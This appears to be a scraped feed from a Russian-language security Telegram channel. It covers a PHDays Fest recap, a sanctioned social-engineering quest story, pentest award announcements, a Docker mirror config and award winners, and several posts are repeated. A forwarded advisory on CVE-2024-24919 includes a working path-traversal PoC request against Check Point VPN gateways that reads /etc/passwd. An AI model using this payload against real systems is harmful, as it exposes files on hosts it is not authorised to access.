Forwarded from Ильдар пишет (Ildar Kh.)
Сходка Похека мега кайф
Kudos и мое безмерное уважение:
- биг дэдди Сергею Зыбневу
- команде триажеров VK
- Слонсеру и его девушке
- Земе
- Лизе Тишиной
Единственным минусом был рестик
А так все шикарно ибо все дни были в хорошей компании - и мой мозг даже не осознает, что завтра конец феста
Kudos и мое безмерное уважение:
- биг дэдди Сергею Зыбневу
- команде триажеров VK
- Слонсеру и его девушке
- Земе
- Лизе Тишиной
Единственным минусом был рестик
А так все шикарно ибо все дни были в хорошей компании - и мой мозг даже не осознает, что завтра конец феста
Ильдар пишет
Сходка Похека мега кайф Kudos и мое безмерное уважение: - биг дэдди Сергею Зыбневу - команде триажеров VK - Слонсеру и его девушке - Земе - Лизе Тишиной Единственным минусом был рестик А так все шикарно ибо все дни были в хорошей компании - и мой мозг даже…
От себя скажу, что был ещё второй столик и там тоже ребята вели не менее интересные разговоры. Мы обсудили прошедший (практически) PHDays Fest 2. Активности, обсудили плюсы и минусы без преукрасов. Посмеялись с разных ситуаций на PHD и её активностей. Как итог лампово просидели 3 часа и разъехались отдыхать после столь плотных, жарких и активных дней)
Всем спасибо кто пришел, всем привет, кто не смог или не захотел прийти, т.к. наложились порядка 3-4 других афтерпати, но мы собрали 20+ человек в ресторане и отлично посидели!
❤️ ❤️ ❤️
Всем хорошей ночи :)
🌚 @poxek
Всем спасибо кто пришел, всем привет, кто не смог или не захотел прийти, т.к. наложились порядка 3-4 других афтерпати, но мы собрали 20+ человек в ресторане и отлично посидели!
Всем хорошей ночи :)
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥20
Positive Hack Days Fest 2 пройден
#phd2
Для ленивых: мероприятие прошло средне
А для всех остальных расскажу поподробнее и заанонсю кое что в конце. Рассказывать буду в +- хронологическом порядке:
➡️ День 1
Ещё до приезда на конференцию увидел парней в своё чате, которые начали выполнять SEQuest и уже раздобыли бейджи организаторов и стаффа (сотрудники мероприятия). Написал им в ЛС, что скоро буду и попросил отложить мне 1 бейдж орга :)
Когда нашлись, обменялись контактами и пошли регнули меня на квест, чтобы всё было официально. Затем я получил бейдж СМИ👑
После прохождения мини-инструктажа от Антона, пошли выполнять таски. Если кратко, то запрещена физика и техничка, нужно что-то делать и куда-то попадать только за счёт социальной инженерии. Ещё когда только был анонс этого квеста, я знал что буду его до посинения выполнять))
Я присоединился к команде ребят, они все школьники (запомните это для комичности всей истории) и выглядят на лет 10 моложе меня. Первые 2 таска, что мы выполнили вместе, это было обнести склад мерча PT в Лужниках и главный мерчстор, который был на начале соревнования самым дорогим таском.
❗️ Как нам удалось это сделать? Всегда заходили "на мужика" и не давали оппонентам время на подумать, перехватывая инициативу в разговоре. Ну и врали до конца. За все 3 дня, нас ни разу не раскрыли, чтобы нам пришлось признаться, что мы выполняем SEQuest))
Адреналин бил ключом у нас весь день 🌚
⚠️ Тут должна была быть вся история, но она получилось слишком длинная, так что услышите её на Awillix Pentest Award, в номинации ЛОВИСЬ РЫБКА - За самый оригинальный фишинг или попытку засоциалить сотрудников. А также, у этой премии есть ещё 5 номинаций :)
Был афтерпати с триажерами и PO BB от VK, Tinkoff, WB и OZON, да и просто другими классными ребятами.
Итог дня был, сданные 6 тасков из 7!! Это было ...словами не описать короче)
Никто не ожидал такого, даже сами организаторы. Как итог после нас всем было сложнее сдавать таски и удвоили везде охрану по стадиону. Но нам это не помешало, о чем далее...
➡️ День 2
Мы за прошедший сдали все таски, кроме громкоговорителя. Сидели с ребятами и придумывали план, где найти эту рубку и как туда попасть. Мы нашли несколько мест, где предположительно есть дикторские микрофоны. Перекусили в штабе PT, тем более там прохладно и тихо. По шумок попробовал включить те микрофоны, которые были в штабе. Они не работали, и мы продолжили дальше думать.
Далее мы разошлись на несколько часов. Я встретился с кууучей друзей и знакомых. Было очень приятно увидеть столько людей, с которыми общался только в онлайне)
На второй день только прошёл всю территорию спокойно, а не из-за тасков.
Потом встретился с новым комьюнити менеджером PT, Кариной. Познакомились и она передала мне презент, как партнёру PHD2. Было очень приятно) Медовуху раздал друзьям и тем кто подходил, сказали что вкусная была😊
Затем мы снова пробовали попасть в рубку, но безуспешно. Поймал Ильдара и вместе пошли на атферпати в китайский ресторан.
День закончился.
➡️ День 3
Приехал на час позже, собрались ребятами и пошли к Антону жаловаться, что таск с громкоговорителем нельзя сдать, т.к. все тупо предупреждены. Иии что вы думаете? Мы пришли и стоял мужчина, которые как оказывается сдал его ровно в 10:00. Мы очень удивились, если честно. И сначала тильтанули... Затем собрали мотивация в кулак и пошли пробовать досдать. Как итог, мы всё таки проникли в рубку, а потом нас чуть не спалили, но у нас была гениальная легенда, что мы якобы расследуем инцидент. А дальше историю вы услышите на Pentest Award. Так скажем не под запись продолжение.
В итоге конкурс SEQuest закончился досрочно
А я поехал со своими друзьями на Похек | Use After Party. Собралось 20 человек, видосик тут и тут, а ещё отзыв тут. Вышло классно, хоть и не без косяков. На твёрдую 4 из 5)
Продолжение в следующем посте, не вместилось всё сюда ⬇️
🌚 @poxek
#phd2
Для ленивых: мероприятие прошло средне
А для всех остальных расскажу поподробнее и заанонсю кое что в конце. Рассказывать буду в +- хронологическом порядке:
Ещё до приезда на конференцию увидел парней в своё чате, которые начали выполнять SEQuest и уже раздобыли бейджи организаторов и стаффа (сотрудники мероприятия). Написал им в ЛС, что скоро буду и попросил отложить мне 1 бейдж орга :)
Когда нашлись, обменялись контактами и пошли регнули меня на квест, чтобы всё было официально. Затем я получил бейдж СМИ
После прохождения мини-инструктажа от Антона, пошли выполнять таски. Если кратко, то запрещена физика и техничка, нужно что-то делать и куда-то попадать только за счёт социальной инженерии. Ещё когда только был анонс этого квеста, я знал что буду его до посинения выполнять))
Я присоединился к команде ребят, они все школьники (запомните это для комичности всей истории) и выглядят на лет 10 моложе меня. Первые 2 таска, что мы выполнили вместе, это было обнести склад мерча PT в Лужниках и главный мерчстор, который был на начале соревнования самым дорогим таском.
Адреналин бил ключом у нас весь день 🌚
Был афтерпати с триажерами и PO BB от VK, Tinkoff, WB и OZON, да и просто другими классными ребятами.
Итог дня был, сданные 6 тасков из 7!! Это было ...словами не описать короче)
Никто не ожидал такого, даже сами организаторы. Как итог после нас всем было сложнее сдавать таски и удвоили везде охрану по стадиону. Но нам это не помешало, о чем далее...
Мы за прошедший сдали все таски, кроме громкоговорителя. Сидели с ребятами и придумывали план, где найти эту рубку и как туда попасть. Мы нашли несколько мест, где предположительно есть дикторские микрофоны. Перекусили в штабе PT, тем более там прохладно и тихо. По шумок попробовал включить те микрофоны, которые были в штабе. Они не работали, и мы продолжили дальше думать.
Далее мы разошлись на несколько часов. Я встретился с кууучей друзей и знакомых. Было очень приятно увидеть столько людей, с которыми общался только в онлайне)
На второй день только прошёл всю территорию спокойно, а не из-за тасков.
Потом встретился с новым комьюнити менеджером PT, Кариной. Познакомились и она передала мне презент, как партнёру PHD2. Было очень приятно) Медовуху раздал друзьям и тем кто подходил, сказали что вкусная была
Затем мы снова пробовали попасть в рубку, но безуспешно. Поймал Ильдара и вместе пошли на атферпати в китайский ресторан.
День закончился.
Приехал на час позже, собрались ребятами и пошли к Антону жаловаться, что таск с громкоговорителем нельзя сдать, т.к. все тупо предупреждены. Иии что вы думаете? Мы пришли и стоял мужчина, которые как оказывается сдал его ровно в 10:00. Мы очень удивились, если честно. И сначала тильтанули... Затем собрали мотивация в кулак и пошли пробовать досдать. Как итог, мы всё таки проникли в рубку, а потом нас чуть не спалили, но у нас была гениальная легенда, что мы якобы расследуем инцидент. А дальше историю вы услышите на Pentest Award. Так скажем не под запись продолжение.
В итоге конкурс SEQuest закончился досрочно
А я поехал со своими друзьями на Похек | Use After Party. Собралось 20 человек, видосик тут и тут, а ещё отзыв тут. Вышло классно, хоть и не без косяков. На твёрдую 4 из 5)
Продолжение в следующем посте, не вместилось всё сюда ⬇️
Please open Telegram to view this post
VIEW IN TELEGRAM
Первая часть поста ⬆️
#phd2
Давайте теперь пройдемся по плюсам:
1. Масштабность. Лужники поистине большие и вместительные
2. Разнообразие квестов и возможностей заработать баллы.
3. Были места, где можно бесплатно попить
4. Много знакомых встретил и новых завёл
5. Были места, где можно было бесплатно получить мерч
Минусы:
и тут я задумался, с чего начать... Начну с того, что мне больше всего не понравилось
1. Организаторы влияли на прохождения SEQuest. Это был очень неприятный факт. Какая цель квест глобально? Проверить awareness сотрудников Лужников и сотрудников PT. А нафига тогда было предупреждать всех сотрудников, о том что их будут пытаться "взломать"? Вопрос останется открытым. После выполнения одного из тасков у нас забрали бейджи, что по правилам. Но удалили из БД... Это уже не по правилам. И к тому же конкретно нашей команде запретили перепроходить этот таск. Хотя у нас на руках были бы настоящие бейджи организаторов. А также потом запретили сдавать таск на громкоговоритель, что было вынуждено, но тоже в минус оргам PT. Также для моей команды были определенные последствия из-за прохождения SEQuest.
1.1. Забыл добавить важную часть, что организаторы от PT постарались защитить нас, это очень важный момент
2. В виду нашего прохождения квеста и попадания в одно место в Лужникам, за нами буквально выехали одни очень интересные люди. Это была как раз эта ситуация.
3. Масштабность. Да, это плюс и минус. Минус, т.к. чтобы дойти из точки А в точку Б, по жаре, нужно было много сил.
4. Standoff 13. Я сразу скажу, что у меня нет собственного мнения про эту часть мероприятия. Я послушал ребят со стороны PT, послушал со стороны Red Team команд. Я думаю все заинтересованные видели большой ответ от команды True0xA3 (ТруОАЗ). Скажу, что проблемы со стороны инфраструктуры Red Team команды - это ежегодная проблема и серьёзная. А в систему кланов уже было кинуто много гнилых помидоров.
5. Мерч. Мерч за баллы мне не понравился, взял для коллекции одну сумку наплечную и всё. (И кстати, могу немного инсайднуть, что PT изготавливали мерч в том же производстве, что и я, поэтому мой мерч задержался)) Мы с оргами PT посмеялись, но это без претензий как бы, просто #funfact.
6. Цены на мерч за реальные деньги высокие. Те же самые вещи, но бланковые стоят иногда х2 дешевле. Но в целом не обеднел, поэтому не сильно минус.
7. Не равноценность выдачи баллов. За тот же SEQuest можно было залутать максимум 360 баллов. Но я делал SEQuest делал по фану и из принципа, так сказать. Походить пообниматься с берёзкой или посидеть втроём в туалете... Можно было заработать больше баллов.
8. Я не застал, но говорили что на стойках регистрации и где-то ещё сотрудники Лужников и PT триггерились на обычных посетителей, думаю что это очередные ребята, проходящие SEQuest. Это не круто!
9. Идея с блокчейном и валютой на собственной платформе - это жесть. Во-первых собирали 100500 ПДн, во-вторых на не российские почты зачастую не приходили письма с подтверждение аккаунта или восстановления. Ну и у платформы был кривой UI, видимо второпях делали платформу. А т.к. это блокчейн, то при отправке валюты другому пользователю брался газ - 20%.
Как-то так. Как и писал выше, мероприятие оцениваю средне. Я считаю это честной оценкой. Даже сравнивая с другими конфами или даже с собственной сходкой. Идеально не бывает, но какие-то моменты сильно ухудшили впечатление. Но объективно, больше пострадали команды Red Team из-за новых правил.
Встретимся на Awillix Pentest Award, там кстати можно выиграть технику Apple и проходки на OFFZONE за подачу своего крутого опыта🕺
А затем встретимся на самом OFFZONE!
🌚 @poxek
#phd2
Давайте теперь пройдемся по плюсам:
1. Масштабность. Лужники поистине большие и вместительные
2. Разнообразие квестов и возможностей заработать баллы.
3. Были места, где можно бесплатно попить
4. Много знакомых встретил и новых завёл
5. Были места, где можно было бесплатно получить мерч
Минусы:
и тут я задумался, с чего начать... Начну с того, что мне больше всего не понравилось
1. Организаторы влияли на прохождения SEQuest. Это был очень неприятный факт. Какая цель квест глобально? Проверить awareness сотрудников Лужников и сотрудников PT. А нафига тогда было предупреждать всех сотрудников, о том что их будут пытаться "взломать"? Вопрос останется открытым. После выполнения одного из тасков у нас забрали бейджи, что по правилам. Но удалили из БД... Это уже не по правилам. И к тому же конкретно нашей команде запретили перепроходить этот таск. Хотя у нас на руках были бы настоящие бейджи организаторов. А также потом запретили сдавать таск на громкоговоритель, что было вынуждено, но тоже в минус оргам PT. Также для моей команды были определенные последствия из-за прохождения SEQuest.
1.1. Забыл добавить важную часть, что организаторы от PT постарались защитить нас, это очень важный момент
2. В виду нашего прохождения квеста и попадания в одно место в Лужникам, за нами буквально выехали одни очень интересные люди. Это была как раз эта ситуация.
3. Масштабность. Да, это плюс и минус. Минус, т.к. чтобы дойти из точки А в точку Б, по жаре, нужно было много сил.
4. Standoff 13. Я сразу скажу, что у меня нет собственного мнения про эту часть мероприятия. Я послушал ребят со стороны PT, послушал со стороны Red Team команд. Я думаю все заинтересованные видели большой ответ от команды True0xA3 (ТруОАЗ). Скажу, что проблемы со стороны инфраструктуры Red Team команды - это ежегодная проблема и серьёзная. А в систему кланов уже было кинуто много гнилых помидоров.
5. Мерч. Мерч за баллы мне не понравился, взял для коллекции одну сумку наплечную и всё. (И кстати, могу немного инсайднуть, что PT изготавливали мерч в том же производстве, что и я, поэтому мой мерч задержался)) Мы с оргами PT посмеялись, но это без претензий как бы, просто #funfact.
6. Цены на мерч за реальные деньги высокие. Те же самые вещи, но бланковые стоят иногда х2 дешевле. Но в целом не обеднел, поэтому не сильно минус.
7. Не равноценность выдачи баллов. За тот же SEQuest можно было залутать максимум 360 баллов. Но я делал SEQuest делал по фану и из принципа, так сказать. Походить пообниматься с берёзкой или посидеть втроём в туалете... Можно было заработать больше баллов.
8. Я не застал, но говорили что на стойках регистрации и где-то ещё сотрудники Лужников и PT триггерились на обычных посетителей, думаю что это очередные ребята, проходящие SEQuest. Это не круто!
9. Идея с блокчейном и валютой на собственной платформе - это жесть. Во-первых собирали 100500 ПДн, во-вторых на не российские почты зачастую не приходили письма с подтверждение аккаунта или восстановления. Ну и у платформы был кривой UI, видимо второпях делали платформу. А т.к. это блокчейн, то при отправке валюты другому пользователю брался газ - 20%.
Как-то так. Как и писал выше, мероприятие оцениваю средне. Я считаю это честной оценкой. Даже сравнивая с другими конфами или даже с собственной сходкой. Идеально не бывает, но какие-то моменты сильно ухудшили впечатление. Но объективно, больше пострадали команды Red Team из-за новых правил.
Встретимся на Awillix Pentest Award, там кстати можно выиграть технику Apple и проходки на OFFZONE за подачу своего крутого опыта
А затем встретимся на самом OFFZONE!
Please open Telegram to view this post
VIEW IN TELEGRAM
🤖 RedShift.Eclipse
1 июня в Колледже программирования и кибербезопасности в рамках финала мероприятия RedShift.Eclipse организуется митап, на котором эксперты из крупнейших IT-компаний затронут темы связанные с их практическим опытом в сфере информационной безопасности.
Дата проведения: 1 июня
Время проведения: с 9:00 до 13:30
Переходите на сайт https://eclipse-ad.ru/, регистрируйтесь через Яндекс.форму "Зарегистрировать слушателя" и ждите подтверждение вашего участия в телеграм
Количество мест ограничено! Срок регистрации до 28 мая
1 июня в Колледже программирования и кибербезопасности в рамках финала мероприятия RedShift.Eclipse организуется митап, на котором эксперты из крупнейших IT-компаний затронут темы связанные с их практическим опытом в сфере информационной безопасности.
Дата проведения: 1 июня
Время проведения: с 9:00 до 13:30
Переходите на сайт https://eclipse-ad.ru/, регистрируйтесь через Яндекс.форму "Зарегистрировать слушателя" и ждите подтверждение вашего участия в телеграм
Количество мест ограничено! Срок регистрации до 28 мая
🐳4
Forwarded from Just Security
This media is not supported in your browser
VIEW IN TELEGRAM
Новая номинация «Пробив ИНФРАСТРУКТУРЫ»
Пробив инфраструктуры — отдельная номинация этого года, за выдающиеся достижения в тестировании на проникновение и эксплуатации уязвимостей сетевой инфраструктуры, включая, но не ограничиваясь, сетевыми устройствами, сетевыми сервисами и IoT-устройствами.
В фокусе — сложность и оригинальность подходов к обнаружению уязвимостей, приводящих к компрометации сетевой инфраструктуры с незначительным взаимодействием веб-компонентов.
Курирует номинацию VK Bug Bounty! Оцените насколько крутой партнер в этот раз поддерживает Pentest award — VK одна из первых компаний в России начала платить внешним исследователям безопасности за найденные уязвимости. В 2024 году VK переосмыслили общепринятый в индустрии подход к выплатам, отказавшись от фиксированных максимальных сумм и внедрив механизм Bounty Pass.
Помимо техники Apple, финалисты номинации от VK Bug Bounty получат комплект мерча, колонку Марусю и экскурсию в офис VK, по местам где еще не ступала нога внешнего пентестера.
Подавайте работы на сайте🍎
#pentestaward
Пробив инфраструктуры — отдельная номинация этого года, за выдающиеся достижения в тестировании на проникновение и эксплуатации уязвимостей сетевой инфраструктуры, включая, но не ограничиваясь, сетевыми устройствами, сетевыми сервисами и IoT-устройствами.
В фокусе — сложность и оригинальность подходов к обнаружению уязвимостей, приводящих к компрометации сетевой инфраструктуры с незначительным взаимодействием веб-компонентов.
Курирует номинацию VK Bug Bounty! Оцените насколько крутой партнер в этот раз поддерживает Pentest award — VK одна из первых компаний в России начала платить внешним исследователям безопасности за найденные уязвимости. В 2024 году VK переосмыслили общепринятый в индустрии подход к выплатам, отказавшись от фиксированных максимальных сумм и внедрив механизм Bounty Pass.
Помимо техники Apple, финалисты номинации от VK Bug Bounty получат комплект мерча, колонку Марусю и экскурсию в офис VK, по местам где еще не ступала нога внешнего пентестера.
Подавайте работы на сайте
#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10
Forwarded from Defbox
Привет!
Много слышно про distroless контейнеры - это такие контейнеры, где нет ничего кроме приложения. Если это компилируемый язык, то в контейнере находится только бинарный файл с приложением, если это интерпретируемый язык, то в контейнере будут интерпретатор и библиотеки. Не будет bash, sh, curl, ls - любых возможных утилит.
Можно подумать, что раз этих утилит нет в контейнере, то даже получив RCE в приложении, атакующий ничего не сможет сделать.
Мы сделали новую лабу, чтобы показать что это не так - и distroless контейнер может быть проэксплуатирован. В нашей новой лабе мы сделали искусственный агент для мониторинга, который запускается так же как многие известные агенты. Его можно проэксплуатировать, из контейнера можно выбраться, а атаку нужно сдетектировать 🙂
Лабу с RSync мы уберем в премиум, а эту лабу сделаем доступной в течение нескольких недель. Успейте попробовать
Много слышно про distroless контейнеры - это такие контейнеры, где нет ничего кроме приложения. Если это компилируемый язык, то в контейнере находится только бинарный файл с приложением, если это интерпретируемый язык, то в контейнере будут интерпретатор и библиотеки. Не будет bash, sh, curl, ls - любых возможных утилит.
Можно подумать, что раз этих утилит нет в контейнере, то даже получив RCE в приложении, атакующий ничего не сможет сделать.
Мы сделали новую лабу, чтобы показать что это не так - и distroless контейнер может быть проэксплуатирован. В нашей новой лабе мы сделали искусственный агент для мониторинга, который запускается так же как многие известные агенты. Его можно проэксплуатировать, из контейнера можно выбраться, а атаку нужно сдетектировать 🙂
Лабу с RSync мы уберем в премиум, а эту лабу сделаем доступной в течение нескольких недель. Успейте попробовать
#docker
Прокси до hub.docker.com
Этот прокси можно использовать, если вы получаете ошибку
Error response from daemon: pull access denied for nginx, repository does not exist or may require 'docker login': denied: <html><body><h1>403 Forbidden</h1> Since Docker is a US company, we must comply with US export control regulations. In an effort to comply with these, we now block all IP addresses that are located in Cuba, Iran, North Korea, Republic of Crimea, Sudan, and Syria. If you are not in one of these cities, countries, or regions and are blocked, please reach out to https://hub.docker.com/support/contact/ </body></html>Как его подключить:
1. Через конфиг докера (как зеркало docker.io)
расположен в:
Linux, regular setup - /etc/docker/daemon.json
Linux, rootless mode - ~/.config/docker/daemon.json
Windows - C:\ProgramData\docker\config\daemon.json
Windows с Docker Desktop - C:\Users\<Пользователь>\.docker\daemon.json
конфиг:
{ "registry-mirrors" : [ "https://dockerhub.timeweb.cloud" ] }теперь при попытке загрузки образа, докер будет сначала пытаться использовать прокси
2. Явное указание адреса
docker pull dockerhub.timeweb.cloud/library/alpine:latestСпасибо коллегам из timeweb, за оперативную помощь!
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from REDtalk (closed_character)
Привет, друзья! Сегодня у нас на повестке дня CVE-2024-24919. Эта уязвимость в Check Point Remote Access VPN позволяет читать файлы на хосте (LFI), причем с привилегиями root. Уязвимыми являются следующие продукты:
- CloudGuard Network
- Quantum Maestro
- Quantum Scalable Chassis
- Quantum Security Gateways
- Quantum Spark Appliances
- Версии:
- R77.20 (EOL)
- R77.30 (EOL)
- R80.10 (EOL)
- R80.20 (EOL)
- R80.20.x
- R80.20SP (EOL)
- R80.30 (EOL)
- R80.30SP (EOL)
- R80.40 (EOL)
- R81
- R81.10
- R81.10.x
- R81.20
POC
Рекомендуем срочно установить обновления: https://support.checkpoint.com/results/sk/sk182336
#cve
- CloudGuard Network
- Quantum Maestro
- Quantum Scalable Chassis
- Quantum Security Gateways
- Quantum Spark Appliances
- Версии:
- R77.20 (EOL)
- R77.30 (EOL)
- R80.10 (EOL)
- R80.20 (EOL)
- R80.20.x
- R80.20SP (EOL)
- R80.30 (EOL)
- R80.30SP (EOL)
- R80.40 (EOL)
- R81
- R81.10
- R81.10.x
- R81.20
POC
POST /clients/MyCRL HTTP/1.1
Host: target_host
Content-Length: 63
aCSHELL/../../../../../../../etc/passwd
Рекомендуем срочно установить обновления: https://support.checkpoint.com/results/sk/sk182336
#cve
😁13👾4
Forwarded from Mobile AppSec World (Yury Shabalin)
Профиль защиты ЦБ РФ и мобильные приложения: разбираемся, как соответствовать
Всем привет!
Наверное, всем рано или поздно приходится сталкиваться с нашим законодательством, требованиями и стандартами. Вот и меня это не обошло стороной и пришлось начать разбираться в ОУД4, соответствии ему, что требуется, как выполнять и т.д. Это был непростой, но на удивление, крайне увлекательный путь, который в итоге привел меня к написанию статьи для таких же как я, тех кто никогда не имел дела с нашими стандартами и ему пришлось в это погрузиться.
Я никогда раньше не погружался в эти документы и это было большим испытанием) Но, к счастью, знающие люди помогли разобраться и объяснили, что и для чего необходимо. И, скажу вам, теперь мне все стало намного понятнее.
Что интересно, в документе, который я изучал более внимательно, а это логическое продолжение ОУД - "Профиль защиты", есть даже упоминание мобильных приложений и как раз это меня и зацепило. Если есть мобильные приложения, значит их тоже надо проверять в составе всего продукта.
Ну что, попробуете разобраться вместе со мной, как соответствовать профилю защиты для мобильных приложений?
#habr #профильзащиты #ОУД4
Всем привет!
Наверное, всем рано или поздно приходится сталкиваться с нашим законодательством, требованиями и стандартами. Вот и меня это не обошло стороной и пришлось начать разбираться в ОУД4, соответствии ему, что требуется, как выполнять и т.д. Это был непростой, но на удивление, крайне увлекательный путь, который в итоге привел меня к написанию статьи для таких же как я, тех кто никогда не имел дела с нашими стандартами и ему пришлось в это погрузиться.
Я никогда раньше не погружался в эти документы и это было большим испытанием) Но, к счастью, знающие люди помогли разобраться и объяснили, что и для чего необходимо. И, скажу вам, теперь мне все стало намного понятнее.
Что интересно, в документе, который я изучал более внимательно, а это логическое продолжение ОУД - "Профиль защиты", есть даже упоминание мобильных приложений и как раз это меня и зацепило. Если есть мобильные приложения, значит их тоже надо проверять в составе всего продукта.
Тестирование на проникновение, в зависимости от типа ОО, может включать в себя следующие направления исследований, применимые к ОО и среде его функционирования:
а) оценка защищенности веб-приложений;
б) оценка защищенности специализированных банковских приложений (специализированного ПО) финансовых организаций;
в) оценка защищенности мобильных устройств
Ну что, попробуете разобраться вместе со мной, как соответствовать профилю защиты для мобильных приложений?
#habr #профильзащиты #ОУД4
Хабр
Профиль защиты ЦБ РФ и мобильные приложения: разбираемся, как соответствовать
Всем привет! На связи Юрий Шабалин, генеральный директор «Стингрей Технолоджиз». Вообще я сторонник технических материалов, статей с примерами кода или разбором технологий, но сегодня речь пойдет о...
🔥12😁2
Forwarded from Cyber Media
🔥Итоги премии «Киберпросвет»
В большинстве номинаций конкуренция с каждым годом растет – мы получаем очень много интересных заявок, среди которых очень трудно выбрать наиболее выдающегося участника.
Много замечательных проектов в этом году остались без награды, но мы обязательно будем отслеживать их деятельность, а отдельные инфоповоды наверняка попадут в нашу ленту новостей.
Представляем победителей:
➡️ «Искать и не сдаваться, найти и отрепортить»: Лука Сафонов, группа компаний Гарда;
➡️ «Не надо представляться, я вас уже загуглил»: АРСИБ;
➡️ «А у вас БД убежала!»: Ксения Шудрова, «Защита персональных данных и не только – книга рецептов»;
➡️ «Часть команды, часть корабля»: ARinteg;
➡️ «Это знать надо, это классика»: Ростелеком;
➡️ «Все великое начинается с малого»: Андрей Матвеенко, МТС RED и Дмитрий Федоров, Positive Technologies;
➡️ «Силу чувствую в тебе я, юный ПК-пользователь»: GigaHackers, УЦСБ;
➡️ «Добро должно быть с эксплойтами»: Айдар Гузаиров, Innostage и Андрей Жуков, УЦСБ;
➡️ «Кибербезопасность – это стильно!»: BI. ZONE и ВТБ;
➡️ «Я научу тебя всему, что умею сам»: Павел Степанов, Перевод Энтузиаста и Angara Security;
➡️ «TeamLead of the cybergym»: Кирилл Филимонов, RAD COP;
➡️ «Кибербезопасность нас связала»: УЦСБ и Союзмультфильм;
➡️ «Любая разгаданная загадка кажется потом поразительно легкой»: F.A.C.C.T.;
➡️ «Я выбрал синюю таблетку и ни о чем не жалею»: Михаил Аксенов, Defbox;
➡️ «Без меня в прод никто не пойдет!»: Светлана Газизова, Positive Technologies;
➡️ «История нашей компании началась еще до печенегов»: Дмитрий Евдокимов, Luntry;
➡️ «Скайнет не победит, если быть ИИнициативными»: Лидия Виткова, «Газинформсервис» и Артем Семенов, Positive Technologies;
➡️ «На лекции — Хакатон, на дом — CTF»: Кафедра №42, НИЯУ МИФИ;
➡️ «У нас дыра в безопасности»: Павел Попов, Positive Technologies;
➡️ «Фиолетовый — цвет сезона»: Вадим Шелест, Wildberries;
➡️ «Каждый сотрудник — часть отдела ИБ»: Роман Панин, МТС.
Узнать подробнее о номинантах, их проектах и деятельности можно на странице премии.
В большинстве номинаций конкуренция с каждым годом растет – мы получаем очень много интересных заявок, среди которых очень трудно выбрать наиболее выдающегося участника.
Много замечательных проектов в этом году остались без награды, но мы обязательно будем отслеживать их деятельность, а отдельные инфоповоды наверняка попадут в нашу ленту новостей.
Представляем победителей:
Узнать подробнее о номинантах, их проектах и деятельности можно на странице премии.
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡11👾1
Forwarded from Proxy Bar
Доброй ночи.
Написал небольшуюкнижку\руководство для начинающих взломщиков Linux.
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org
#book #linux #hex
Написал небольшую
Сей труд навеян вечным вопросом "Подскажите с чего начать?".
На какую то уникальность не претендую, но надеюсь кому то окажется полезным.
За вычитку благодарю uberhahn
Ну и с первым днем лета и днем защиты детей )
Само руководство book.proxy-bar.org
#book #linux #hex
Выступил в колледже РТУ МИРЭА программирования и кибербезопасности. Были ребята очень разные, даже девушка дизайнер :D
Но всем судя по всему понравилось и изначально удивило, что меня узнали. Обычно я прихожу ноунеймом выступать)
А ещё дали классные стикеры и ещё кое что в презенте))
Спасибо ребятам, которые пригласили меня выступить. Не пожалел, что встал рано утром в субботу :)
🌚 @poxek
Но всем судя по всему понравилось и изначально удивило, что меня узнали. Обычно я прихожу ноунеймом выступать)
А ещё дали классные стикеры и ещё кое что в презенте))
Спасибо ребятам, которые пригласили меня выступить. Не пожалел, что встал рано утром в субботу :)
Please open Telegram to view this post
VIEW IN TELEGRAM
Обзор курса Certified Penetration Testing Specialist (CPTS) от HTB Academy
#htb #cpts
Приветствую, в этой статье автор рассказал о курсе и итоговом экзамене HTB CPTS. Надеюсь, что это даст понимание всем, кто собирается проходить курс и сдавать экзамен в будущем.
➡️ Читать далее
🌚 @poxek
#htb #cpts
Приветствую, в этой статье автор рассказал о курсе и итоговом экзамене HTB CPTS. Надеюсь, что это даст понимание всем, кто собирается проходить курс и сдавать экзамен в будущем.
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Обзор курса Certified Penetration Testing Specialist (CPTS) от HTB Academy
Приветствую, в этой статье я расскажу о курсе и итоговом экзамене HTB CPTS. Надеюсь, что это даст понимание всем, кто собирается проходить курс и сдавать экзамен в будущем. В предыдущей статье я...
Пурум-пум-пум. Всем привет, я возвращаюсь с новостями по поводу мерча.
Сегодня 5 часов подряд собирал вам мерч-комплекты, в который входил шоппер+футболка(и). Очень устал, никогда бы не подумал, что это так сложно.😢
Так как я первый раз занимался массовой отправкой мерча, приношу свои извинения, если пришёл не тот дизайн или не тот размер. Если такое случится, то пишите мне в ЛС @szybnev, отнесёте на ПВЗ и я оплачу доставку обратно. Естественно заменю на правильный размер/дизайн и отправлю снова)
Очень странно, но обнаружилась недосдача мерча от производства, пару футболок M/L размера. Или у меня настолько замылился взгляд, что я уже ничего не понимаю.
Короче всё сложно... Надеюсь отправленное - придёт кому нужно и нужных размеров.
P.S. отправил не все заказы, кому не написал сегодня, не волнуйтесь. В другой день с вами свяжусь обязательно!
🌚 you HAVE been POXEKED
Сегодня 5 часов подряд собирал вам мерч-комплекты, в который входил шоппер+футболка(и). Очень устал, никогда бы не подумал, что это так сложно.
Так как я первый раз занимался массовой отправкой мерча, приношу свои извинения, если пришёл не тот дизайн или не тот размер. Если такое случится, то пишите мне в ЛС @szybnev, отнесёте на ПВЗ и я оплачу доставку обратно. Естественно заменю на правильный размер/дизайн и отправлю снова)
Очень странно, но обнаружилась недосдача мерча от производства, пару футболок M/L размера. Или у меня настолько замылился взгляд, что я уже ничего не понимаю.
Короче всё сложно... Надеюсь отправленное - придёт кому нужно и нужных размеров.
P.S. отправил не все заказы, кому не написал сегодня, не волнуйтесь. В другой день с вами свяжусь обязательно!
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Just Security
Ждем заявки от профи и новичков, грейд не важен, важен лишь пытливый ум и способность донести свои результаты до жюри. Мы обращаем внимание на развернутое повествование, описание контекста и вводных, примеры эксплуатации, скрины и пруфы наличия уязвимостей.
Конкуренция в разных номинациях разная, у каждого есть шанс на победу.
1. Пробив WEB
2. Пробив инфраструктуры
3. Девайс
4. «**ck the logic» — За находку самых топовых логических баг.
5. «Раз bypass, два bypass» — За самый красивый обход средств защиты информации.
6. «Ловись рыбка» — За самый оригинальный фишинг или попытку засоциалить сотрудников. Оценивается всё: нагрузка, текст фишинга, использование нестандартных инструментов.
